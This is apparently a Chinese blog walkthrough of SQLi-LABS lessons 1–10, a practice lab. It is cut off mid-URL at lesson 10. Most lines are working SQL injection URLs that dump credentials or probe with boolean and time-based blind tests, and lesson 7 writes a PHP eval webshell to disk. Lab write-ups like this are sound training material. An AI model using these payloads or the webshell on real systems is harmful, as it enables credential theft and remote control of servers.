less 1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
http://localhost/sqli-labs/Less-1/?id=-1' or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+
less 2 GET - Error based - Intiger based (基于错误的GET整型注入)
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 0,1 %23
less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
http://localhost/sqli-labs/Less-3/?id=-1%27) union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 6,1 --+
less 4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
http://localhost/sqli-labs/Less-4/?id=1") union select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 1,1 --+less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23
less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
http://localhost/sqli-labs/Less-6/?id=1" union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a%23
less 7 GET - Dump into outfile - String (导出文件GET字符型注入)
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,'2','<?php @eval($_POST["giantbranch"]);?>' into outfile 'E:\\wamp\\www\\sqli-labs\\muma.php' %23
less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
sqlmap 跑跑跑
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1)>64 %23 返回正确,大于64
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>96 %23 返回正确,大于96
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))<123 %23 返回正确,小于123 ,区间在97-122
less 9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
sqlmap 跑跑跑
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23
less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
把上面的改成双引号就行判断为基于时间的双引号注入
http://localhost/sqli-l
SQLi-LABS-Page-1(Basic-Challenges)-less1-22注入教程
最新推荐文章于 2024-08-11 08:00:00 发布
这篇博客介绍了SQL注入的基础挑战,包括GET和POST方式,涉及单引号、双引号、布尔型、时间型等多种注入类型。通过示例解释了如何利用sqlmap进行测试,并提供了部分解题思路,如在特定场景下如何构造注入语句。
摘要由CSDN通过智能技术生成